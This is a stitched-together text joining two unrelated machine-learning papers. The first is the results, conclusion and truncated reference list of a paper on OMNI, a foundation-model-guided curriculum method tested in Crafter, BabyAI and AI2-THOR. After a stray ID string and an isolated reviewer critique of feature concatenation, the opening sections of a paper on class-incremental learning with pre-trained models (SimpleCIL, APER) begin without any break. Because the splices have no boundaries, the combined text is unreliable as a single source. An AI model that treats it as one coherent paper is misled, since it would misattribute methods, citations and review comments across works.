We evaluate our methods with two metrics: (1) the average task success rate, and (2) the number of tasks with success rates exceeding a predetermined threshold $\alpha$. This study sets $\alpha = 0.2$, consistent with the selections made in related literature (Kanitscheider et al., 2021; Team et al., 2023). The first metric reflects the agent's average performance across all tasks, while the second metric captures the extent to which the agent is a generalist that has decent competency on many different tasks. These metrics are calculated on the full task set (Figures 2 and 7). Metrics calculated on interesting tasks only are shown in Appendix O. All confidence intervals given are 95% median bootstrap confidence intervals obtained by resampling 1000 times.
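As a minimal sketch of this bootstrap procedure (with `values` holding one statistic per random seed; all names are illustrative):

```python
import numpy as np

def median_bootstrap_ci(values, n_boot: int = 1000, seed: int = 0):
    """95% median bootstrap confidence interval over per-seed statistics."""
    rng = np.random.default_rng(seed)
    values = np.asarray(values, dtype=float)
    boot_medians = np.array([
        np.median(rng.choice(values, size=values.size, replace=True))
        for _ in range(n_boot)
    ])
    return (np.median(values),
            np.percentile(boot_medians, 2.5),
            np.percentile(boot_medians, 97.5))
```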
Confidence intervals are reported with the following notation: \(\text{stat}\) (CI: lower – upper), where \(\text{stat}\) is the median across runs. Shaded areas in graphs also indicate the 95% median bootstrap confidence interval obtained by resampling 1000 times.

**Uniform Sampling.** As expected, the results with uniform sampling are poor. Worse, the agents did not improve over time as most tasks sampled are too difficult or too easy for the agent and successes are extremely sparse (Figures 2 and 7). The agent is considered to have learned a task if its conditional success probability on that task is at least 0.2. In Crafter, the agent learns 4 (CI: 4 – 6) tasks (interesting or boring) and only 3 (CI: 2 – 3) interesting tasks. The agent achieves an average task success rate of 0.030 (CI: 0.026 – 0.033) on interesting and boring tasks, and 0.103 (CI: 0.087 – 0.120) on interesting tasks only. In BabyAI, the agent learns only 1 (CI: 0 – 1) task and achieves an average task success rate of 4.7e-3 (CI: 4.6e-3 – 5.0e-3) on all tasks.

**Learning Progress Curriculum.** By focusing on tasks with suitable difficulty, the agent learns to do a lot more tasks with higher success rates than uniform sampling. In Crafter, the agent learns 55 (CI: 54 – 56) tasks (interesting or boring) and 9 (CI: 9 – 11) interesting tasks. The agent achieves an average task success rate of 0.42 (CI: 0.41 – 0.43) on interesting and boring tasks, and 0.52 (CI: 0.50 – 0.56) on interesting tasks only. In BabyAI, the agent learns 4 (CI: 4 – 6) tasks and achieves an average task success rate of 5.9e-3 (CI: 5.5e-3 – 6.2e-3) on all tasks. Across all metrics and in both domains, the differences in performance between LP and Uniform at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that LP significantly outperforms uniform sampling (Figures 2 and 7). LP samples tasks that are at the frontier of the agent's capabilities (Figures 2, 7, 8, 14). When a task's conditional success probability changes, LP focuses more on it. Hence, there will be more rollouts where the task is the given goal and thus more positive examples from which the agent can learn to solve the conditioned task. However, LP is distracted by boring tasks (Figures 8 and 14). When the conditional success probabilities of boring tasks change, LP allocates higher sampling weights to them even though they are similar to other sampled tasks and might not expand the agent's range of skills.

**OMNI: Learning Progress + a Model of Interestingness.** To automatically select and focus on interesting tasks, an FM is prompted in a few-shot manner to predict which tasks are interesting. By combining LP with an MoI, OMNI focuses on the subset of high learning progress tasks that are interesting. In Crafter, the agent learns 82 (CI: 80 – 87) tasks (interesting or boring) and 14 (CI: 14 – 14) interesting tasks. The agent achieves an average task success rate of 0.56 (CI: 0.54 – 0.58) on interesting and boring tasks, and 0.78 (CI: 0.76 – 0.80) on interesting tasks only. In BabyAI, the agent learns 8 (CI: 7 – 10) tasks and achieves an average task success rate of 7.5e-3 (CI: 7.3e-3 – 7.7e-3) on all tasks.
Across all metrics and in both domains, the differences in performance between OMNI and LP at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that OMNI significantly outperforms an LP-only curriculum (Figures 2 and 7). OMNI is not distracted by uninteresting yet learnable tasks, and focuses on the interesting tasks only (Figures 8 and 14). The trained agent not only achieves higher average task success rates, but also learns more challenging tasks faster (Figures 2 and 7). We thus know OMNI performs better than LP alone, but how good is it at predicting interesting tasks? To address this, we created an oracle for the MoI, termed the Oracle Model of Interestingness (OMoI). Impressively, the performance of the FM-based MoI is nearly on par with the oracle, suggesting that OMNI is highly effective in identifying interesting tasks for the agent to learn on (Appendix P).

5 EXPERIMENTS IN AN INFINITE TASK SPACE

In truly open-ended settings, there are an infinite number of possible tasks. This section demonstrates OMNI in such a setting. Essential to training an agent capable of handling any task in such an open-ended learning framework is the development of a universal reward function, which can evaluate if any task has been completed or not. This section proposes an instantiation of OMNI that solves that problem by not only having FMs propose new, interesting tasks, but also by having the FM generate the code for a reward function that determines to what extent each proposed task has been performed.

5.1 METHODS

In an infinite task space, it is impossible to evaluate every possible task to determine the agent's learning progress. Hence, instead of using a predefined set of tasks, we use a pretrained autoregressive FM, GPT-4 (OpenAI, 2023), to generate learnable and interesting tasks throughout training. The LP curriculum then produces task sampling rates over this growing task set (Section 3.2). We input tasks that the agent can do well and tasks that the agent cannot do yet, then prompt GPT-4 in a zero-shot manner to suggest the next learnable and interesting tasks. Tasks done well are those completed with success rates greater than a predefined threshold (0.6 in AI2-THOR experiments). We also ask GPT-4 to output a sequence of environment states (in code format) that can be used to check whether or not the task has been successfully completed during training and evaluation. Appendix D shows the full prompt and Appendix E shows an example output.

There are existing approaches that use FMs to generate code as reward functions (Kwon et al., 2023; Wang et al., 2023a; Yu et al., 2023). This version of OMNI integrates the generation of the task and the code requirements for task completion into a single output. This integrated approach ensures that every generated task comes with a comprehensive definition of what constitutes its completion (in code format). This approach can work for any domain in which one can run code to make queries about the underlying state. We apply OMNI to a complex, embodied robotics kitchen domain, AI2-THOR (Kolve et al., 2017), and show that OMNI is not only able to continuously generate learnable and interesting tasks, but also learns more tasks over time than controls.

5.2 AI2-THOR ENVIRONMENT

Figure 3: AI2-THOR environment and results. (Left) Agent's egocentric view and bird's-eye view in an AI2-THOR kitchen environment.
(Right) OMNI learns more tasks than the Learning Progress and Uniform sampling baselines. Example tasks learned by OMNI are shown in gray boxes.

AI2-THOR (Kolve et al., 2017) is an embodied 3D domain characterized by its near photo-realistic environment (Figure 3). We train our methods on an AI2-THOR kitchen floorplan. The environment contains many objects commonly found in a real kitchen, such as food (e.g., apple, bread), appliances (e.g., coffee machine, microwave), and tools (e.g., mug, pan). The agent has 13 discrete actions: MoveAhead, RotateRight, RotateLeft, LookUp, LookDown, Pickup, Put, Open, Close, ToggleOn, ToggleOff, Slice, and FillWithLiquid. We simplify the action mechanics that require a target object as an argument (e.g., the Pickup action, which requires a target object like Cup). Rather than force the agent to specify one of an infinite number of possible objects, if the object mentioned in the current task is visible and requires the action to be applied to it to complete the task, it is automatically designated as the target object. If not, the target defaults to the visible object nearest to the agent. The agent's observation includes 300 x 300 RGB pixel observations of a 90° field of view, and a description of the task in natural language (embedded with a look-up table and GRU, Appendix N). The agent receives a +1 reward, with a small penalty of 0.001 for each time step, when it has successfully completed the given task.

A task can be described in natural language or by a sequence of environment states. For the agent to complete a given task, it needs to sequentially achieve a list of environment states (specified in code). For example, if the task is "Pick up an apple, then put it down", the corresponding code format could be `[[obj_attributes("Apple", "isPickedUp": True)], [obj_attributes("Apple", "isPickedUp": False)]]`, whereby the agent has to achieve the first environment state where the apple is picked up, then achieve the second environment state where the apple is not picked up. The task space is infinite, as there is no restriction on the number of attributes to check for in each environment state, or the length of environment states to be achieved sequentially when specifying each task. The complexity and variability of tasks and interactions in AI2-THOR are significant, yet represent only a fraction of the possibilities of a Darwin Complete environment generator, meaning one that can create any possible learning environment (Clune, 2019). By demonstrating OMNI in this infinite AI2-THOR task space, we mark a step towards that ultimate, lofty goal of generating learnable and interesting tasks in a search space that includes any conceivable environment.

5.3 RESULTS

AI2-THOR RL agents are trained with PPO (Schulman et al., 2017), a standard RL algorithm. Policy details and hyperparameters are in Appendix N. We compare the performance of agents trained with: (1) Uniform sampling (Appendix I.1), (2) LP, the Learning Progress curriculum over a growing task set where random tasks are added (Appendix I.2), and (3) OMNI, which is the Learning Progress curriculum applied over a growing task set where interesting and learnable tasks suggested by the FM are added (Section 5.1). Uniform sampling, the control, uniformly samples any task within the task space. Uniform sampling is naive and samples tasks that are too difficult for the agent most of the time, hurting learning (before even factoring in whether the tasks are worth learning).
LP samples tasks based on the calculated learning progress weights (Section 3.2), but most tasks added to the task set are too difficult. OMNI automatically generates learnable and interesting tasks for the agent to learn on. All experiments are run for 1 million time steps and are repeated 10 times with different random seeds. Each experiment takes ~24 hrs on a 24GB NVIDIA A10 GPU with 30 virtual CPUs.

In this vast landscape of infinite potential tasks, it is impossible to evaluate on every conceivable task. Hence, each method is only evaluated on tasks that have ever been sampled before. We measure our methods by the number of tasks completed at a success rate greater than a predetermined threshold (here, 0.6). All confidence intervals are 95% median bootstrap confidence intervals obtained by resampling 1000 times. Confidence intervals are reported with the following notation: stat (CI: lower – upper), where stat is the median across runs. Shaded areas in graphs also indicate the 95% median bootstrap confidence interval obtained by resampling 1000 times.

**Uniform Sampling.** As expected, the results with uniform sampling are poor. The agent trained with Uniform sampling learns 0 (CI: 0 – 2) tasks (defined here and in other treatments as a conditional success probability of at least 0.6).

**Learning Progress Baseline.** Although the LP curriculum allows the agent to focus on the learnable tasks within the task set, because the tasks added to the task set are often too difficult, the agent does not learn many tasks either. The agent trained with LP learns 2 (CI: 0 – 3) tasks.

**OMNI.** To automatically generate and learn interesting tasks, an FM is prompted in a zero-shot manner to suggest the next new learnable and interesting tasks, augmenting the task set for the agent to train on. The agent trained with OMNI learns 13 (CI: 11 – 17) tasks. The differences in performance between OMNI and both baselines (Uniform sampling and LP baseline) at 25%, 50%, 75%, and 100% of the way through training are statistically significant (all p < 1e-3, Mann Whitney U test), showing that OMNI significantly outperforms both Uniform sampling and the LP baseline (Figure 3).

6 DISCUSSION, FUTURE WORK, AND CONCLUSION

In conclusion, our work demonstrates the potential of using an MoI to significantly enhance auto-curricula and the quest for open-ended learning algorithms by intelligently focusing on learnable and interesting tasks. OMNI addresses the Achilles Heel of open-ended systems, which lies in defining and quantifying interestingness, as previous attempts have resulted in pathologies when optimizing against such definitions and quantifications. OMNI mitigates this problem by leveraging human notions of interestingness to guide AI systems. There are numerous ways to implement the principles of this new paradigm, and exploring different versions presents an exciting avenue for future research (Appendix U). The generality and applicability of OMNI to other open-ended domains with vast task spaces further underscores its significance. In the long run, it hints at a synergy between FMs and open-endedness that simultaneously addresses looming challenges for both: how will FMs ultimately rise to the level of creativity seen in the best of human innovation, and how will open-endedness overcome the trap of diverging into a vast space of uninspiring mediocrity?
By playing off each other's strengths, FMs can perhaps someday become essential engines of open-ended discovery and begin to participate in the creative dance that has defined civilization since its inception.

ACKNOWLEDGMENTS

This work was supported by the Vector Institute, the Canada CIFAR AI Chairs program, a grant from Schmidt Futures, an NSERC Discovery Grant, and a generous donation from Rafael Cosman. We also thank Andrew Dai, Cédric Colas, and members in our lab at the University of British Columbia, namely Aaron Dharna, Ben Norman, and Shengran Hu, for insightful discussions and feedback.

REFERENCES

Michael Ahn, Anthony Brohan, Noah Brown, Yevgen Chebotar, Omar Cortes, Byron David, Chelsea Finn, Keerthana Gopalakrishnan, Karol Hausman, Alex Herzog, et al. Do as i can, not as i say: Grounding language in robotic affordances. *arXiv preprint arXiv:2204.01691*, 2022.

Ilge Akkaya, Marcin Andrychowicz, Maciek Chociej, Mateusz Litwin, Bob McGrew, Arthur Petron, Alex Paino, Matthias Plappert, Glenn Powell, Raphael Ribas, et al. Solving rubik's cube with a robot hand. *arXiv preprint arXiv:1910.07113*, 2019.

Mihael Ankerst, Markus M Breunig, Hans-Peter Kriegel, and Jörg Sander. OPTICS: Ordering points to identify the clustering structure. *ACM Sigmod record*, 28(2):49–60, 1999.

Arthur Aubret, Laetitia Matignon, and Salima Hassas. A survey on intrinsic motivation in reinforcement learning. *arXiv preprint arXiv:1908.06976*, 2019.

Joshua E Auerbach and Josh C Bongard. Evolving CPPNs to grow three-dimensional physical structures. In *Proceedings of the 12th annual conference on Genetic and evolutionary computation*, pp. 627–634, 2010.

Yuntao Bai, Saurav Kadavath, Sandipan Kundu, Amanda Askell, Jackson Kernion, Andy Jones, Anna Chen, Anna Goldie, Azalia Mirhoseini, Cameron McKinnon, et al. Constitutional AI: Harmlessness from AI feedback. *arXiv preprint arXiv:2212.08073*, 2022.

Adrien Baranes and Pierre-Yves Oudeyer. Active learning of inverse models with intrinsically motivated goal exploration in robots. *Robotics and Autonomous Systems*, 61(1):49–73, 2013.

Marc Bellemare, Sriram Srinivasan, Georg Ostrovski, Tom Schaul, David Saxton, and Remi Munos. Unifying count-based exploration and intrinsic motivation. *Advances in neural information processing systems*, 29, 2016.

Yoshua Bengio, Jérôme Louradour, Ronan Collobert, and Jason Weston. Curriculum learning. In *Proceedings of the 26th annual international conference on machine learning*, pp. 41–48, 2009.

Rishi Bommasani, Drew A Hudson, Ehsan Adeli, Russ Altman, Simran Arora, Sydney von Arx, Michael S Bernstein, Jeannette Bohg, Antoine Bosselut, Emma Brunskill, et al. On the opportunities and risks of foundation models. *arXiv preprint arXiv:2108.07258*, 2021.

Nick Bostrom. Existential risks: Analyzing human extinction scenarios and related hazards. *Journal of Evolution and Technology*, 9, 2002.

Herbie Bradley, Andrew Dai, Hannah Teufel, Jenny Zhang, Koen Oostermeijer, Marco Bellagente, Jeff Clune, Kenneth Stanley, Grégory Schott, and Joel Lehman. Quality-Diversity through AI Feedback. *arXiv preprint arXiv:2310.13032*, 2023.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. *Advances in neural information processing systems*, 33:1877–1901, 2020.

Shaofei Cai, Zihao Wang, Xiaojian Ma, Anji Liu, and Yitao Liang.
Open-world multi-task control through goal-aware representation learning and adaptive horizon prediction. In *Proceedings of the IEEE/CVF Conference on Computer Vision and Pattern Recognition*, pp. 13734–13744, 2023.

Andres Campero, Roberta Raileanu, Heinrich Küttler, Joshua B Tenenbaum, Tim Rocktäschel, and Edward Grefenstette. Learning with amigo: Adversarially motivated intrinsic goals. *arXiv preprint arXiv:2006.12122*, 2020.
mrRbIcyouU
* Concatenating features does not ensure true adaptability to new classes, as it might lead to a model that is more of an ensemble of old and new knowledge rather than a seamlessly adapted model, raising the following concerns: (3) Lack of Interaction Between Old and New Knowledge: The concatenation approach lacks a mechanism for interaction between the old knowledge (represented by the PTM’s features) and the new knowledge (represented by the adapted model’s features). Adaptability might require a more dynamic integration of old and new knowledge, allowing the model to restructure its internal representations in light of new information.
REVISITING CLASS-INCREMENTAL LEARNING WITH PRE-TRAINED MODELS: GENERALIZABILITY AND ADAPTIVITY ARE ALL YOU NEED

Anonymous authors Paper under double-blind review

ABSTRACT

Class-incremental learning (CIL) aims to adapt to emerging new classes without forgetting old ones. Traditional CIL models are trained from scratch to continually acquire knowledge as data evolves. Recently, pre-training has achieved substantial progress, making vast pre-trained models (PTMs) accessible for CIL. Contrary to traditional methods, PTMs possess generalizable embeddings, which can be easily transferred for CIL. In this work, we revisit CIL with PTMs and argue that the core factors in CIL are adaptivity for model updating and generalizability for knowledge transferring. 1) We first reveal that a frozen PTM can already provide generalizable embeddings for CIL. Surprisingly, a simple baseline (SimpleCIL) which continually sets the classifiers of the PTM to prototype features can beat the state of the art even without training on the downstream task. 2) Due to the distribution gap between pre-trained and downstream datasets, the PTM can be further cultivated with adaptivity via model adaptation. We propose AdaPt and mERge (APER), which aggregates the embeddings of the PTM and the adapted model for classifier construction. APER is a general framework that can be orthogonally combined with any parameter-efficient tuning method, and holds the advantages of the PTM's generalizability and the adapted model's adaptivity. 3) Additionally, considering that previous ImageNet-based benchmarks are unsuitable in the era of PTM due to data overlap, we propose four new benchmarks for assessment, namely ImageNet-A, ObjectNet, OmniBenchmark, and VTAB. Extensive experiments validate the effectiveness of APER with a unified and concise framework.

1 INTRODUCTION

With the advancement of deep learning, deep models have achieved impressive feats in many fields (He et al., 2016; Simonyan & Zisserman, 2014; Tan et al., 2020). However, most research focuses on recognizing a limited number of classes in static environments. In the real world, applications often deal with streaming data with incoming new classes (Gomes et al., 2017). To address this issue, Class-Incremental Learning (CIL) has been proposed, which allows the model to learn from the evolving data and continuously build a unified classification model. Nevertheless, when new classes are added sequentially, the notorious catastrophic forgetting occurs (French, 1999), which erases the previously learned knowledge. Many prior works (Li & Hoiem, 2017; Masana et al., 2022; De Lange et al., 2021) are designed to continually build a holistic embedding without forgetting.

While typical methods assume that the model is "trained from scratch," recent advancements in pre-training (Han et al., 2021) have made Pre-Trained Models (PTMs) more accessible for designing models in downstream tasks. These PTMs are often trained on massive corpora (Radford et al., 2021) or countless images (Deng et al., 2009; Ridnik et al., 2021) with handcrafted tricks (Steiner et al., 2021), resulting in strong generalizability. Consequently, several methods (Wang et al., 2022e; Villa et al., 2022) propose to leverage PTMs for better incremental learning. Powerful PTMs alleviate the burden of the learning process, substantially surpassing the performance upper bound of non-PTM-based methods (Zhou et al., 2023a). However, upon revisiting the objective of CIL, we find essential differences between these protocols.
Without PTMs, CIL models are trained from random initialization to continually acquire the knowledge of new classes and build a unified embedding space, which requires adaptivity for sequential updating. In contrast, PTMs are trained with massive datasets, which makes it easier to achieve an ideal knowledge and embedding space with strong generalizability. Take the human learning process as an example: non-PTM methods aim to teach an infant to grow up and continually acquire knowledge through college, while PTM-based methods teach an experienced adult to do the same thing, which is much easier.

To evaluate the generalizability of PTMs, we formulate a CIL task using the VTAB (Zhai et al., 2019) dataset and test the performance of state-of-the-art PTM-based methods (Wang et al., 2022d,e) with a pre-trained ViT-B/16-IN1K in Figure 1. As a comparison, we present a simple baseline, SimpleCIL, to evaluate the quality of the pre-trained features. With the pre-trained embedding function frozen, SimpleCIL sets the classifier weights to the average embeddings (Snell et al., 2017) of each new class for classification. If PTMs already possess generalizable features, directly matching the average pattern to each query instance could also achieve competitive results. Surprisingly, we find that SimpleCIL outperforms the current SOTA by 5% even without any tuning on these downstream tasks, verifying the strong generalizability of PTMs in knowledge transfer.

Although PTMs are generalizable for CIL, a domain gap may still exist between pre-trained and incremental datasets (Zhou et al., 2022b; You et al., 2020). For instance, an ImageNet pre-trained model may not generalize well to out-of-distribution (Hendrycks et al., 2021b) or specialized tasks (Alfassy et al., 2022). Under such circumstances, freezing the embedding for knowledge transferring is not a "panacea." Accordingly, adaptivity becomes essential to enable the model to grasp task-specific features. Nevertheless, sequentially tuning the PTM will harm the structural information and weaken the generalizability (Kumar et al., 2022), leading to the irreversible forgetting of previous knowledge. Is there a way to unify the generalizability of the PTM with the adaptivity of the adapted model?

In this paper, we present AdaPt and mERge (APER) for class-incremental learning, which employs a PTM to enhance generalizability and adaptivity in a unified framework. To improve adaptivity, we adapt the PTM in the first incremental stage via parameter-efficient tuning. Adapting the model helps to obtain task-specific features and fills the domain gap between the PTM and incremental data. We then concatenate the adapted model with the PTM to extract average embeddings as the classifier, thereby maintaining generalizability. APER restricts model tuning to the first stage, striking a balance between adaptivity and generalizability. Moreover, typical ImageNet-based CIL benchmarks are unsuitable for evaluation due to the overlap between pre-trained and downstream tasks. Therefore, we benchmark PTM-based CIL with four new datasets that have large domain gaps with the pre-trained data. Extensive experiments under various settings demonstrate the effectiveness of APER.

2 RELATED WORK

**Class-Incremental Learning (CIL)**: enables a learning system to continually incorporate new concepts without forgetting old ones (Zhou et al., 2023a). Typical CIL methods can be roughly divided into four categories.
The first group saves and replays exemplars from old classes to recover former knowledge (Aljundi et al., 2019; Chaudhry et al., 2018; Iscen et al., 2020). The second group utilizes knowledge distillation to align the outputs of old and new models, thereby maintaining knowledge of old concepts (Li & Hoiem, 2017; Rebuffi et al., 2017b; Douillard et al., 2020; Zhang et al., 2020; Hu et al., 2021). The third group rectifies the inductive bias in the incremental model through normalization and logit/feature adjustment (Shi et al., 2022; Belouadah & Popescu, 2019; Pham et al., 2022). Lastly, other works expand the network when needed to enhance representation ability (Yoon et al., 2018; Yan et al., 2021; Douillard et al., 2022; Wang et al., 2022a,d,e,b).

**CIL with PTM**: is becoming a popular topic with the increasing prevalence of PTMs (Dosovitskiy et al., 2020; Radford et al., 2021). The aim is to sequentially adjust the PTM to stream data with new classes. L2P (Wang et al., 2022c) applies visual prompt tuning (Jia et al., 2022) to CIL based on the pre-trained Vision Transformer (Dosovitskiy et al., 2020) and learns a prompt pool to select the instance-specific prompt. DualPrompt (Wang et al., 2022d) extends L2P with general and expert prompts. Different from the key-value search in L2P, CODA-Prompt (Smith et al., 2023) improves the prompt selection process with an attention mechanism. (Wang et al., 2022c) explores the anchor-based energy self-normalization strategy to aggregate multiple pre-trained classifiers. When changing ViT into CLIP (Radford et al., 2021), (Wang et al., 2022b; Villa et al., 2022) extend L2P by learning prompts for both text and image modalities (Zhou et al., 2022c).

**Parameter-Efficient Tuning for PTM**: aims to adapt the PTM to downstream tasks by tuning only a small number of (extra) parameters. Compared to fully finetuning, parameter-efficient tuning obtains competitive or even better performance at a much lower cost. VPT (Jia et al., 2022) prepends tunable prefix tokens (Li & Liang, 2021) to the input or hidden layers. LoRA (Hu et al., 2022) learns low-rank matrices to approximate parameter updates. (Houlsby et al., 2019; Chen et al., 2022a) learn extra adapter (Rebuffi et al., 2017a) modules with downsize and upsize projections. (Pfeiffer et al., 2021) merges the learned adapters with a fusion module. SSF (Lian et al., 2022) addresses the scaling and shifting operation for model tuning. Apart from additional modules in the network, (Bahng et al., 2022) proposes learning tunable parameters in the input space. Finally, (He et al., 2022a) formulates these works in a unified framework.

3 FROM OLD CLASSES TO NEW CLASSES

Class-incremental learning aims to learn from an evolving data stream with new classes to build a unified classifier (Rebuffi et al., 2017b). There is a sequence of $B$ training tasks $\{D^1, D^2, \cdots, D^B\}$, where $D^b = \{(x_i^b, y_i^b)\}_{i=1}^{n_b}$ is the $b$-th incremental step with $n_b$ instances. Here, a training instance $x_i^b \in \mathbb{R}^D$ belongs to class $y_i^b \in Y_b$, where $Y_b$ is the label space of task $b$ and $Y_b \cap Y_{b'} = \emptyset$ for $b \neq b'$. During the $b$-th training stage, we can only access data from $D^b$ for model updating. This paper focuses on the exemplar-free CIL setting (Zhu et al., 2021; Wang et al., 2022c), where no historical data can be fetched for rehearsal.
The goal of CIL is to incrementally build a unified model for all seen classes, i.e., acquiring knowledge from new classes while preserving knowledge from former ones. The model's capability is evaluated over all seen classes $\mathcal{Y}_b = Y_1 \cup \cdots \cup Y_b$ after each incremental task. Formally, the target is to fit a model $f(x) : X \rightarrow \mathcal{Y}_b$ that minimizes the empirical risk across all testing datasets:

$$\sum_{(x_j, y_j) \in D_{te}^1 \cup \cdots \cup D_{te}^b} \ell(f(x_j), y_j), \tag{1}$$

where $\ell(\cdot, \cdot)$ measures the discrepancy between the prediction and the ground-truth label, and $D_{te}^b$ denotes the testing set of task $b$. A good CIL model satisfying Eq. (1) has discriminability among all classes, striking a balance between learning new classes and remembering old ones.

Following (Wang et al., 2022c,b), we assume the availability of a pre-trained model (e.g., a ViT (Dosovitskiy et al., 2020) or ResNet (He et al., 2016)) on ImageNet (Deng et al., 2009), which we use as the initialization of $f(x)$. For clarity, we decouple the deep model into two parts: $f(x) = W^\top \phi(x)$, where $\phi(\cdot) : \mathbb{R}^D \rightarrow \mathbb{R}^d$ is the embedding function and $W \in \mathbb{R}^{d \times |\mathcal{Y}_b|}$ is the classification head. We denote the classifier for class $k$ as $w_k$: $W = [w_1, \cdots, w_{|\mathcal{Y}_b|}]$. We refer to the features after pooling as $\phi(x)$ for convolutional networks. In a plain ViT, the input encoding layer transforms the image into a sequence of output features $x_e \in \mathbb{R}^{L \times d}$, where $L$ is the sequence length. We assume the first token in $x_e$ to be the $[\text{CLS}]$ token to simplify notation. $x_e$ is then fed into the subsequent layers (i.e., multi-head self-attention and MLP) to produce the final embeddings. We treat the embedded $[\text{CLS}]$ token as $\phi(x)$ for ViT.

**Adaptivity and Generalizability in CIL**

**CIL with Adaptivity:** Before introducing PTMs into CIL, models are trained from scratch to gradually acquire knowledge of new classes. The naive idea is to update the incremental model with cross-entropy loss, which equips the model with adaptivity to adapt to new tasks:

$$\mathcal{L} = \sum_{(x_i, y_i) \in D^b} \ell(f(x_i), y_i) + \mathcal{L}_{reg}, \tag{2}$$

where $\mathcal{L}_{reg}$ stands for the regularization terms that resist forgetting, e.g., knowledge distillation (Hinton et al., 2015; Li & Hoiem, 2017) or parameter regularization (Kirkpatrick et al., 2017).

**CIL with Generalizability:** With the introduction of PTMs to CIL (Wang et al., 2022e), continual learners are born with generalizability, which can be directly transferred to downstream tasks without learning. Correspondingly, we define a simple baseline, **SimpleCIL**, to transfer the PTM for incremental tasks. With the embedding function $\phi(\cdot)$ frozen throughout the learning process, we extract the average embedding (i.e., prototype (Snell et al., 2017)) of each class:

$$p_i = \frac{1}{K} \sum_{j=1}^{|D^b|} \mathbb{I}(y_j = i)\,\phi(x_j), \tag{3}$$

where $K = \sum_{j=1}^{|D^b|} \mathbb{I}(y_j = i)$, and $\mathbb{I}(\cdot)$ is the indicator function. The averaged embedding represents the most common pattern of the corresponding class. We set the prototype as the classifier, i.e., $w_i = p_i$, to directly adjust the PTM for CIL. SimpleCIL demonstrates competitive performance in Figure 1, confirming the strong generalizability of PTMs.
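To make Eq. (3) concrete, the following is a minimal PyTorch sketch of the SimpleCIL baseline, assuming a frozen feature extractor `phi` (e.g., a pre-trained ViT returning the embedded [CLS] token) and a standard `DataLoader`; the names `phi`, `build_simplecil_prototypes`, and `simplecil_predict` are illustrative, not taken from the paper's code.

```python
import torch

@torch.no_grad()
def build_simplecil_prototypes(phi, loader, num_classes, feat_dim):
    """Eq. (3): prototype p_i = class-wise mean of frozen embeddings phi(x)."""
    protos = torch.zeros(num_classes, feat_dim)
    counts = torch.zeros(num_classes)
    for x, y in loader:
        z = phi(x)                                   # (batch, d); phi stays frozen
        protos.index_add_(0, y, z)                   # accumulate per-class sums
        counts.index_add_(0, y, torch.ones_like(y, dtype=torch.float))
    return protos / counts.clamp(min=1).unsqueeze(1)  # average -> prototypes

@torch.no_grad()
def simplecil_predict(phi, x, prototypes):
    """Set w_i = p_i and classify by the highest-scoring prototype."""
    return (phi(x) @ prototypes.T).argmax(dim=1)
```

In practice, each incremental stage only fills in the prototype rows of its newly arrived classes; no parameter of `phi` is ever updated.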
**Generalizability vs. Adaptivity:** Eq. (2) and Eq. (3) address different aspects of CIL models. The former aims to enhance adaptivity by enabling the model to be gradually tuned. By contrast, the latter highlights the model's generalizability by freezing it throughout the learning process. To understand their roles in CIL, we conduct an experiment on CIFAR100 with 20 incremental tasks and compare the performance of finetuning versus SimpleCIL. These methods are based on a pre-trained ViT-B/16-IN21K, and we separately report the performance on new ($Y_b$) and old ($\mathcal{Y}_{b-1}$) classes in Figure 2. Specifically, SimpleCIL relies on the generalizability of the pre-trained features and performs competitively without training on the target dataset. However, it can be further improved to grasp the task-specific features, and finetuning shows better performance on new classes with the help of adaptivity. However, finetuning suffers catastrophic forgetting of old classes since the features are continually changing. To summarize, these characteristics are two core aspects of CIL: adaptivity enables the model to bridge the domain gap between pre-training and incremental learning, while generalizability encourages knowledge transfer from pre-training to incremental learning. Therefore, both of them should be cultivated to facilitate CIL.

4 APER: ADAPT AND MERGE PTMS FOR CIL

Motivated by the potential for enhancing both generalizability and adaptivity, can we achieve these characteristics in a unified framework? Specifically, we aim to achieve this goal from two aspects. On the one hand, to bridge the domain gap between the PTM and downstream datasets, model adaptation is essential to move the PTM towards the incremental data. On the other hand, since the adapted model may lose the generalizability of high-level features, we attempt to merge the adapted model and the PTM into a unified network for future tasks. The merged embedding function is kept frozen throughout the incremental learning process, transferring the generalizable embedding of the model set to incoming new classes. In this way, generalizability and adaptivity are achieved in a unified framework. We first introduce the framework of APER and then discuss the specific techniques for model adaptation.

Figure 3: Illustration of APER. **Left**: the training protocol of APER. We adapt the PTM using the first-stage training set $D^1$ and then concatenate the embedding functions of the PTM and the adapted model to maintain generalizability and adaptivity. The aggregated embedding function $[\phi^*(\cdot), \phi(\cdot)]$ is frozen throughout the following stages, and we extract the prototypes via Eq. (6) to set the classifier. **Middle**: adapting a pre-trained ViT for CIL. We provide VPT-Deep/Shallow, Scale & Shift, and Adapter for model adaptation. **Right**: adapting a pre-trained CNN for CIL. We provide BN tuning and Scale & Shift for model adaptation. APER is a general framework that can be orthogonally combined with these adapting techniques. Red modules in the figure are trainable, while gray ones are frozen.

4.1 TRAINING PROCEDURE OF APER

Although PTMs have discriminating features, there may exist a significant domain gap between the pre-trained dataset and the incremental data. For example, the PTM is optimized to capture the characteristics of classes in ImageNet, while the incremental data stream may correspond to specialized data that requires domain knowledge or has extensive concept drift from ImageNet. To bridge this gap, an adapting process can be developed with the incremental data:

$$f^*(x) = \mathcal{F}(f(x), D, \Theta), \tag{4}$$

where the adapting algorithm $\mathcal{F}$ takes the current model $f(x)$ and the dataset $D$ as input.
It optimizes the parameter set $\Theta$ and produces the adapted model $f^*(x)$, which gains the domain-specific knowledge in the corresponding dataset. We introduce the variations of $\mathcal{F}$ in Section 4.2. If we could obtain all the incremental training sets at once, adapting the model via $\mathcal{F}(f(x), D^1 \cup D^2 \cdots \cup D^B, \Theta)$ could transfer the knowledge from the PTM to the incremental dataset and grasp the task-specific features for better performance. However, since data in CIL arrive sequentially, we cannot hold all the training sets at once. Continuously adapting the model would consequently result in catastrophic forgetting (as shown in Figure 2(b)). Hence, a natural solution is to adapt the model only in the first incremental stage:

$$f^*(x) = \mathcal{F}(f(x), D^1, \Theta). \tag{5}$$

